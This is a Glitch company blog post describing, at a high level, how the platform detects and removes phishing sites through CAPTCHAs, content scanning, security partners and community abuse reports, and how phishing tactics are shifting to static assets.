How we keep Glitch sites secure and trusted
Over the years, we’ve done a lot of work to make sure apps and sites that are published on Glitch are trustworthy. That’s our responsibility as a platform, but it’s also good for our community, as it means your apps will be part of a healthy, trustworthy ecosystem. It’s been a while since we’ve shared details of this work, so we wanted to share a high-level overview of how we think about the challenge. We've got some wins to celebrate, some lessons learned, and a clear sense of where our future challenges lie.
**TL;DR: **Glitch intentionally makes app creation as easy and open as possible, which means opening up to more potential misuses of the platform, including phishing sites. By working with a community of security researchers and our own user community, we've been able to significantly improve both our response time and our proactive action on removing potentially harmful contents over the last year. Today, less than one half of one percent of new apps created on Glitch are flagged as being potentially harmful, with that statistic going down over time. And the mean time-to-resolution for reports of potential risk continues to improve, along with faster and more comprehensive suspension and blocking of users that create potentially harmful sites. We expect future challenges to come from phishing attempts that are built across multiple sites, and will be working with the other platforms in the ecosystem to address those threats as they arise.
Reducing Barriers #
First, let’s consider what problem we’re trying to solve. Glitch is designed to make it as easy as possible to create full-stack websites without any barriers. In any system, reducing barriers to creation means it’s easier for bad actors to abuse those systems to make malicious creations. In our particular case, Glitch allows for creating web pages or apps without even logging in, so reducing potential abuse is even trickier than platforms that rely on traditional authentication or login.
The next question that arises is what kind of untrustworthy content could be created on Glitch? The primary concern here is the creation of phishing sites that are designed to capture users’ credentials or personal information. We’ve used a series of layered approaches to counter this risk over the years, with each building on the prior efforts. (This is a high-level overview so our community knows our philosophy on handling the problem, not as an exhaustive technical review of all the efforts we’ve taken.)
- We began with selective reduction in privileges for anonymous accounts, including limiting the automated creation of projects or content on Glitch. By introducing a CAPTCHA for app creation, we were able to greatly reduce the amount of projects that were created by bots or automated systems, without compromising the ability for users to make apps without logging in. (This is a common use case for students using Glitch in schools, for example.)
- Within projects, we limited access to a very small subset of code libraries that were primarily being used in abusive or malicious ways, and added systems for scanning for known malicious content. Together, these efforts have been extremely effective in curtailing potentially harmful projects while having very little impact on legitimate users of the platform.
- We’ve worked with outside security organizations to build automated scanning for malicious projects if any get past our internal controls, including partners like Phishlabs and Netcraft, and resources like openphish.com and urlscan.io. The research community that works diligently around these issues has been incredibly supportive of our efforts here, especially over the last year or so as we’ve begun tying their work more closely into our internal tooling for preventing or suspending malicious project creation.
- Being a community-based platform, we’ve also made continual improvements to our community reporting functions as well. Every page of the Glitch.com site includes a “report abuse” button, and every report sent through that system receives a response within 24 business hours. For the vast majority of cases, user-submitted abuse reports cover sites that our internal tools have already flagged for review, which means we've often taken action even before letting the reporting user know that we've done so.
- Finally, we’ve built tools to improve our response times to be even faster. We’ve always had a straightforward security reporting infrastructure with defined processes for handling security or trust issues that are reported, but thanks to the upgrades we’ve put in place, we’re able to act more quickly to take down any malicious projects, or even to take action on accounts which create malicious content. These improvements have yielded huge improvements across the board. Having better support tools has actually helped all Glitch users, as our mean time to response for any support ticket has decreased by nearly 40% even as the volume of support requests has increased by almost 75%.
But specific to issues around malicious content on Glitch, we’ve found that, from a sampling of 50,000 projects created during November 2021, fewer than 0.3% were flagged as potentially harmful content by either our systems or the reports generated by our partners. We’re working to improve this further, but consider it a good sign of progress in addressing the issue.
With any security or trust domain, having success in one area always results in the battleground shifting a bit to new areas. For example, while we initially focused on malicious full-stack apps being the biggest area of concern on Glitch, what we’ve found with more recent reports is that bad actors are increasingly using static resources (sometimes static HTML, sometimes other document formats like PDF) to try to capture credentials, often with the actual submission of content pointing to other, larger providers like the giant cloud hosting platforms. These static resources are typically served as assets on Glitch, not as part of the core app hosting platform, so they send different signals from full-stack apps that might be potentially harmful.
We’ve worked with our partners to update our monitoring to accommodate these new vectors of attack, and initial results are promising, but what we take away from this learning is that we’ll increasingly see sophisticated attempts that go across multiple services, with Glitch (or part of Glitch’s infrastructure) just being an intermediary in a larger, networked effort. One recent such set of attempts was documented by DomainTools, which looked at these phishing attempts in depth, revealing both their attempted targets (businesses with employees working in the Middle East) as well as their intended mechanism of capturing data (compromised WordPress sites forwarding to an Outlook email address) that show the complexity of tracking these efforts across multiple services. While these patterns are well-established in the general web hosting industry, they're relatively new to Glitch as a community, and represent novel iterations on the pattern that will take time to fully prevent. We expect to have some advantages in this work over time by relying on the social aspects of our platform to help us better distinguish the small number of malicious actors on the platform from the millions of legitimate users.
Overall, we’ve been grateful for the support of our community, including both our users who report potentially harmful apps, as well as the security researchers who provide infrastructure for proactively stopping bad actors. Over time, we’ve gotten better and better at reducing the amount of potential risk on Glitch, both in the absolute and as a percentage of what gets created on the platform every day. We are firmly committed to keeping creation and remixing on Glitch as open and accessible as possible, which means we’re also committed to being responsible for stopping the inevitable misuses that come along with that openness. And we’re glad to do it, because it means that Glitch gets to keep being a great, trusted place for you to make the most creative, interesting, innovative, and useful stuff on the web.